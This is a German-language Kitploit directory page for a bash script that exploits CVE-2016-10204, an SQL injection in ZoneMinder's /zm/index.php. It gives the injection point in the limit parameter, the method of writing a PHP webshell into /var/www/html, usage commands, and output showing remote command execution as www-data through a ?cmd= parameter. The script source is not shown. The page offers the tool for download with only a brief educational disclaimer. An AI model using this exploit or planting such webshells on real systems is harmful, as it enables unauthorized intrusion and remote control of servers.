Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2016-10204_Webshell — Ein Bash-Skript, das die manuelle Ausnutzung von CVE-2016-10204 gegen einen Zielendpunkt demonstriert und zum Hochladen einer PHP-Webshell führt. | Kitploit
Tools/GitHubGitHub/0xnullcomet/cve-2016-10204_webshell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHub0xnullcomet/cve-2016-10204_webshell

CVE-2016-10204_Webshell

Ein Bash-Skript, das die manuelle Ausnutzung von CVE-2016-10204 gegen einen Zielendpunkt demonstriert und zum Hochladen einer PHP-Webshell führt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

CVE-2016-10204_Webshell

Ein Bash-Skript, das die manuelle Ausnutzung von CVE-2016-10204 gegen einen Ziel-Endpunkt demonstriert und zum Hochladen einer PHP-Webshell führt.

Derzeit ist die Webshell-Variable für ein MySQL-Payload gesetzt. Dies kann durch jedes Backend ersetzt werden, das Sie anvisieren müssen.

Weitere Informationen zu dieser CVE finden Sie unter diesen Quellen:

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10204
  • https://www.exploit-db.com/exploits/41239
  • https://www.openwall.com/lists/oss-security/2017/02/05/1

Dieses Skript funktioniert auf verschiedene Weise:

  • Nimmt eine Ziel-URL im regulären Ausdrucksformat ^(http|https)://[^/]+/zm/index.php$ entgegen
    • Z.B. http://192.168.10.100/zm/index.php
  • Überprüft, ob nicht bereits eine Webshell unter der angegebenen Ziel-URL und dem Webshell-URL-Suffix vorhanden ist
    • Wenn vorhanden, wird nicht erneut ausgenutzt.
    • Wenn nicht vorhanden, wird fortgefahren
  • Erstellt eine bösartige POST-Anfrage an den Endpunkt /zm/index.php?view=request&request=log&task=query&limit=100&minTime=1466674406.084434
    • Diese Anfrage enthält einen Injektionspunkt im Parameter &limit=100, den wir missbrauchen, um Folgendes zu tun
    • Eine neue Webshell-Datei in /var/www/html erstellen
    • SELECT der Zeichenkette "" INTO diese Datei (wir streamen sie in die Datei, während wir die Datei schreiben)
  • Überprüft, ob die hochgeladene Webshell erstellt wurde und unter der konstruierten URL erreichbar ist
  • Liefert den Beweis, indem der Befehl 'id' ausgeführt und seine Ausgabe angezeigt wird.

Verwendung:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php

Allgemeine Verwendung:
/bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target_endpoint/zm/index.php>

Hilfe:


Beispiel:

root@kitploit:~

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Attempting webshell deployment. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23

[*]================================[*]
[*]Webshell deployment successful. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


Erneutes Ausführen gegen ein bereits ausgenutztes Ziel:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Webshell already deployed.      [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


Enthaltene Hilfe:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
A bash script demonstrating the manual exploitation of CVE-2016-10204 against a target endpoint,
leading to upload of a php webshell.

More information:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

Usage:
  /bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>

Example:
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

Notes:
- Verifies if a webshell already exists before attempting exploitation.
- Constructs a malicious SQLi payload to write a PHP webshell into /var/www/html.
- Confirms deployment by executing 'id' via the ?cmd= parameter.
- Please use responsibly only against devices you have permission to do. This is for educational purposes only.

Tool herunterladen